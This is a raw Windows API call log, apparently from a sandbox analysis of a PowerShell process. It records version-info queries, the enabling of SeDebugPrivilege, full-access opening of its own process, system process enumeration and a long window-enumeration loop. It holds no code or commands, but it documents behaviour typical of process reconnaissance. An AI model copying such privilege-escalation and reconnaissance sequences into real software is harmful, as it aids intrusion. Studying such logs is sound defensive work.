	[0944.904] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d576c0, puLen=0xcdb20) returned 1
	[0944.904] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0944.904] CoTaskMemAlloc (cb=0x58) returned 0x24b610
	[0944.904] lstrcpyW (in: lpString1=0x24b610, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0944.904] CoTaskMemFree (pv=0x24b610) 
	[0944.904] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d5773c, puLen=0xcdb20) returned 1
	[0944.904] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.904] CoTaskMemAlloc (cb=0x20) returned 0x2f4ed0
	[0944.904] lstrcpyW (in: lpString1=0x2f4ed0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.904] CoTaskMemFree (pv=0x2f4ed0) 
	[0944.905] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2d573e4, puLen=0xcdb20) returned 1
	[0944.905] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0944.905] CoTaskMemAlloc (cb=0x66) returned 0x2ea8a0
	[0944.905] lstrcpyW (in: lpString1=0x2ea8a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0944.905] CoTaskMemFree (pv=0x2ea8a0) 
	[0944.905] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x0, puLen=0xcdb20) returned 0
	[0944.905] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x0, puLen=0xcdb20) returned 0
	[0944.905] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x0, puLen=0xcdb20) returned 0
	[0944.905] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdaf8, puLen=0xcdaf0 | out: lplpBuffer=0xcdaf8*=0x2d5738c, puLen=0xcdaf0) returned 1
	[0944.906] CoTaskMemAlloc (cb=0x204) returned 0x28f860
	[0944.906] VerLanguageNameW (in: wLang=0x0, szLang=0x28f860, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0945.594] CoTaskMemFree (pv=0x28f860) 
	[0945.595] VerQueryValueW (in: pBlock=0x2d572f0, lpSubBlock="\\", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2d57318, puLen=0xcdb40) returned 1
	[0945.601] GetCurrentProcessId () returned 0x1208
	[0945.619] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcca70 | out: lpLuid=0xcca70*(LowPart=0x14, HighPart=0)) returned 1
	[0945.622] GetCurrentProcess () returned 0xffffffffffffffff
	[0945.623] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcca90 | out: TokenHandle=0xcca90*=0x2d8) returned 1
	[0945.624] AdjustTokenPrivileges (in: TokenHandle=0x2d8, DisableAllPrivileges=0, NewState=0x2d5ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0945.625] CloseHandle (hObject=0x2d8) returned 1
	[0946.332] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1208) returned 0x2d8
	[0946.341] EnumProcessModules (in: hProcess=0x2d8, lphModule=0x2d5abd0, cb=0x200, lpcbNeeded=0xcdaa8 | out: lphModule=0x2d5abd0, lpcbNeeded=0xcdaa8) returned 1
	[0946.344] GetModuleInformation (in: hProcess=0x2d8, hModule=0x13f370000, lpmodinfo=0x2d5ae40, cb=0x18 | out: lpmodinfo=0x2d5ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0946.345] CoTaskMemAlloc (cb=0x804) returned 0x2f5f70
	[0946.345] GetModuleBaseNameW (in: hProcess=0x2d8, hModule=0x13f370000, lpBaseName=0x2f5f70, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0946.345] CoTaskMemFree (pv=0x2f5f70) 
	[0946.346] CoTaskMemAlloc (cb=0x804) returned 0x2f5f70
	[0946.346] GetModuleFileNameExW (in: hProcess=0x2d8, hModule=0x13f370000, lpFilename=0x2f5f70, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0946.347] CoTaskMemFree (pv=0x2f5f70) 
	[0946.347] CloseHandle (hObject=0x2d8) returned 1
	[0946.355] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1208) returned 0x2d8
	[0946.356] GetExitCodeProcess (in: hProcess=0x2d8, lpExitCode=0xcdbd8 | out: lpExitCode=0xcdbd8*=0x103) returned 1
	[0946.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d5b088, Length=0x20000, ResultLength=0xcdba0 | out: SystemInformation=0x12d5b088, ResultLength=0xcdba0*=0x4a190) returned 0xc0000004
	[0946.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d7b0b8, Length=0x4c990, ResultLength=0xcdba0 | out: SystemInformation=0x12d7b0b8, ResultLength=0xcdba0*=0x4a1e0) returned 0x0
	[0947.004] EnumWindows (lpEnumFunc=0x23666ac, lParam=0x0) 
	[0947.899] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.899] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x558
	[0947.899] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.899] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.899] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.899] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x538
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x778
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x778
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.900] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x460
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4d0
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x2440
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x24d8
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1aa4
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1ff0
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1a84
	[0947.901] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1fb0
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1e10
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x23a8
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1f24
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x21ec
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x2320
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1fd4
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1880
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1b18
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1d6c
	[0947.902] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x233c
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x2368
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x2124
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x22f0
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x22ac
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1cdc
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x10f0
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1f18
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x20a8
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x2004
	[0947.903] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1f88
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1f84
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x2050
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1e04
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1ecc
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1e64
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1b58
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1e94
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1e28
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1df8
	[0947.904] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1da8
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1c70
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x163c
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1a10
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x186c
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1d74
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x4c8
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1960
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1ce4
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1b24
	[0947.905] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x14e0
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x17f0
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x854
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1268
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1624
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1b9c
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x16f4
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x145c
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x17d0
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1d28
	[0947.906] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xcb8
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1190
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x3a8
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1bd0
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1bfc
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1a78
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1b90
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1b04
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1b34
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1b64
	[0947.907] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1bb0
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1acc
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1a2c
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x19a8
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1944
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x18c8
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x18ac
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x18ec
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1898
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xc98
	[0947.908] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x153c
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1808
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x12a4
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1740
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x16c4
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1820
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x16ac
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1858
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1664
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x10b4
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x10ac
	[0947.909] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x10ec
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1068
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x17e0
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x102c
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x17a4
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1050
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1694
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1770
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1720
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x165c
	[0947.910] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1578
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x16c0
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x161c
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1638
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x15c8
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1554
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1674
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1520
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x14bc
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xf8c
	[0947.911] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xe9c
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1434
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x14ec
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xfcc
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x12ac
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1484
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x934
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xc0c
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xb08
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x948
	[0947.912] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1178
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x13e0
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xcd0
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x13fc
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xdc8
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xc18
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xc2c
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xa1c
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1244
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0xdb0
	[0947.913] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1398
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1358
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1370
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1340
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x130c
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x12c0
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x12e4
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1270
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x1298
	[0947.914] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcd900 | out: lpdwProcessId=0xcd900) returned 0x120c
